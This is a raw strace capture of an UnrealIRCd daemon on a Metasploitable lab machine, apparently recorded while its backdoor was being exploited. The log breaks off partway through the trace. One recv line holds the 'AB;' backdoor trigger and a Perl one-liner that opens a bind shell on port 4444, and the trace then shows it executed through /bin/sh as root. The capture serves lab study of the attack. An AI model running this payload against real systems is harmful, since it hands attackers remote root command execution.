4519  07:32:51.442962 select(1024, [2 3 4 7 9], [], NULL, {0, 830000}) = 1 (in [9], left {0, 710000})

4519  07:32:51.556279 clock_gettime(CLOCK_MONOTONIC, {2381, 373300890}) = 0

4519  07:32:51.556302 recv(9, "PRIVMSG  #testit3 ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 71

4519  07:32:51.556334 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556355 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556370 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556385 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556398 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556412 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556426 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556440 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556453 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556467 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556480 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556494 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556507 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556520 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556534 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556547 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556561 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556574 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556587 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556602 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556645 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556661 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.556691 time(NULL)        = 1495625571

4519  07:32:51.556701 time(NULL)        = 1495625571

4519  07:32:51.556713 gettimeofday({1495625571, 556717}, NULL) = 0

4519  07:32:51.556724 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:32:51.556753 clock_gettime(CLOCK_MONOTONIC, {2381, 373766263}) = 0

4519  07:32:51.556764 gettimeofday({1495625571, 556767}, NULL) = 0

4519  07:32:51.556774 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 920000})

4519  07:32:51.639108 clock_gettime(CLOCK_MONOTONIC, {2381, 456128775}) = 0

4519  07:32:51.639129 accept(2, 0, NULL) = 5

4519  07:32:51.639150 getpeername(5, {sa_family=AF_INET, sin_port=htons(35141), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:32:51.639220 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:32:51.639234 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:32:51.639248 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:32:51.639274 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:32:51.639286 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:32:51.639297 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:32:51.639308 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:32:51.639325 clock_gettime(CLOCK_MONOTONIC, {2381, 456339140}) = 0

4519  07:32:51.639337 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:32:51.639349 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:32:51.639359 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:32:51.639368 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:32:51.639378 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:32:51.639402 send(6, "B\216\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:32:51.639520 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:32:51.639550 gettimeofday({1495625571, 639569}, NULL) = 0

4519  07:32:51.639577 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:32:51.644294 clock_gettime(CLOCK_MONOTONIC, {2381, 461311460}) = 0

4519  07:32:51.644311 recvfrom(6, "B\216\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\1+\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:32:51.644381 close(6)          = 0

4519  07:32:51.644396 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:32:51.644411 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:32:51.644468 time(NULL)        = 1495625571

4519  07:32:51.644481 time(NULL)        = 1495625571

4519  07:32:51.644493 gettimeofday({1495625571, 644496}, NULL) = 0

4519  07:32:51.644504 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:32:51.644533 clock_gettime(CLOCK_MONOTONIC, {2381, 461545821}) = 0

4519  07:32:51.644563 gettimeofday({1495625571, 644566}, NULL) = 0

4519  07:32:51.644574 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 770000})

4519  07:32:51.866354 clock_gettime(CLOCK_MONOTONIC, {2381, 683375487}) = 0

4519  07:32:51.866377 recv(4, "PRIVMSG  #testit Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 54

4519  07:32:51.866423 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866441 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866456 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866507 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866521 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866534 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866547 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866560 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866573 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866587 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866599 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866613 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866626 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866639 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866652 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866665 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866678 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866744 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866795 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866810 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866823 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866836 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:32:51.866868 gettimeofday({1495625571, 866872}, NULL) = 0

4519  07:32:51.866886 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:32:51.866927 clock_gettime(CLOCK_MONOTONIC, {2381, 683939986}) = 0

4519  07:32:51.866939 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:32:51.866966 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:32:51.866986 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:32:51.866998 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:32:51.867012 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 10404

10404 07:32:51.867081 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

10404 07:32:51.867095 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

10404 07:32:51.867105 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10404 07:32:51.867118 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

10404 07:32:51.867268 brk(0)            = 0x80f9000

10404 07:32:51.867290 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10404 07:32:51.867306 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f04000

10404 07:32:51.867322 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10404 07:32:51.867339 open("/etc/ld.so.cache", O_RDONLY) = 1

10404 07:32:51.867351 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10404 07:32:51.867369 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7efc000

10404 07:32:51.867379 close(1)          = 0

10404 07:32:51.867389 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10404 07:32:51.867404 open("/lib/libncurses.so.5", O_RDONLY) = 1

10404 07:32:51.867416 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

10404 07:32:51.867509 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

10404 07:32:51.867526 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ecc000

10404 07:32:51.867537 mmap2(0xb7ef9000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7ef9000

10404 07:32:51.867554 close(1)          = 0

10404 07:32:51.867566 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10404 07:32:51.867579 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10404 07:32:51.867593 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10404 07:32:51.867755 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10404 07:32:51.867788 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ec8000

10404 07:32:51.867800 mmap2(0xb7eca000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7eca000

10404 07:32:51.867816 close(1)          = 0

10404 07:32:51.867828 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10404 07:32:51.867842 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10404 07:32:51.867869 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10404 07:32:51.867955 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10404 07:32:51.867971 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ec7000

10404 07:32:51.867985 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d78000

10404 07:32:51.867995 mmap2(0xb7ec1000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ec1000

10404 07:32:51.868010 mmap2(0xb7ec4000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ec4000

10404 07:32:51.868023 close(1)          = 0

10404 07:32:51.868045 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d77000

10404 07:32:51.868057 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d776b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10404 07:32:51.868111 mprotect(0xb7ec1000, 4096, PROT_READ) = 0

10404 07:32:51.868147 munmap(0xb7efc000, 29913) = 0

10404 07:32:51.868173 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10404 07:32:51.868254 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

10404 07:32:51.868288 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf9c4b80) = -1 ENOTTY (Inappropriate ioctl for device)

10404 07:32:51.868332 brk(0)            = 0x80f9000

10404 07:32:51.868341 brk(0x80fa000)    = 0x80fa000

10404 07:32:51.868353 brk(0x80fb000)    = 0x80fb000

10404 07:32:51.868369 getuid32()        = 0

10404 07:32:51.868381 getgid32()        = 0

10404 07:32:51.868390 geteuid32()       = 0

10404 07:32:51.868399 getegid32()       = 0

10404 07:32:51.868412 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10404 07:32:51.868425 time(NULL)        = 1495625571

10404 07:32:51.868438 brk(0x80fc000)    = 0x80fc000

10404 07:32:51.868455 brk(0x80fd000)    = 0x80fd000

10404 07:32:51.868474 open("/proc/meminfo", O_RDONLY) = 1

10404 07:32:51.868494 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

10404 07:32:51.868512 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f03000

10404 07:32:51.868523 read(1, "MemTotal:      1035240 kB\nMemFree:        416888 kB\nBuffers:         77252 kB\nCached:         381700 kB\nSwapCached:          0 kB\nActive:         256392 kB\nInactive:       331488 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        416648 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4376 kB\nWriteback:           0 kB\nAnonPages:      128984 kB\nMapped:          52008 kB\nSlab:            19188 kB\nSReclaimable:    10624 kB\nSUnreclaim:       8564 kB\nPageTables:       1976 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

10404 07:32:51.868603 close(1)          = 0

10404 07:32:51.868614 munmap(0xb7f03000, 4096) = 0

10404 07:32:51.868626 brk(0x80fe000)    = 0x80fe000

10404 07:32:51.868660 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10404 07:32:51.868674 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10404 07:32:51.868686 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10404 07:32:51.868698 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10404 07:32:51.868709 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

10404 07:32:51.868720 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

10404 07:32:51.868733 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10404 07:32:51.868745 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10404 07:32:51.868757 uname({sys="Linux", node="metasploitable", ...}) = 0

10404 07:32:51.868804 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

10404 07:32:51.868821 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10404 07:32:51.868839 brk(0x8100000)    = 0x8100000

10404 07:32:51.868850 getcwd("/etc/unreal", 4096) = 12

10404 07:32:51.868864 getpid()          = 10404

10404 07:32:51.868880 getppid()         = 4519

10404 07:32:51.868896 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10404 07:32:51.868915 stat64("/sbin/sh", 0xbf9c4b58) = -1 ENOENT (No such file or directory)

10404 07:32:51.868928 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10404 07:32:51.868944 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10404 07:32:51.868967 socket(PF_FILE, SOCK_STREAM, 0) = 1

10404 07:32:51.868980 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10404 07:32:51.868992 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10404 07:32:51.869012 close(1)          = 0

10404 07:32:51.869024 socket(PF_FILE, SOCK_STREAM, 0) = 1

10404 07:32:51.869033 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10404 07:32:51.869043 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10404 07:32:51.869060 close(1)          = 0

10404 07:32:51.869074 open("/etc/nsswitch.conf", O_RDONLY) = 1

10404 07:32:51.869087 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

10404 07:32:51.869103 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f03000

10404 07:32:51.869114 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

10404 07:32:51.869165 read(1, "", 4096) = 0

10404 07:32:51.869204 close(1)          = 0

10404 07:32:51.869213 munmap(0xb7f03000, 4096) = 0

10404 07:32:51.869243 open("/etc/ld.so.cache", O_RDONLY) = 1

10404 07:32:51.869256 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10404 07:32:51.869271 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7efc000

10404 07:32:51.869281 close(1)          = 0

10404 07:32:51.869291 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10404 07:32:51.869306 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

10404 07:32:51.869320 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 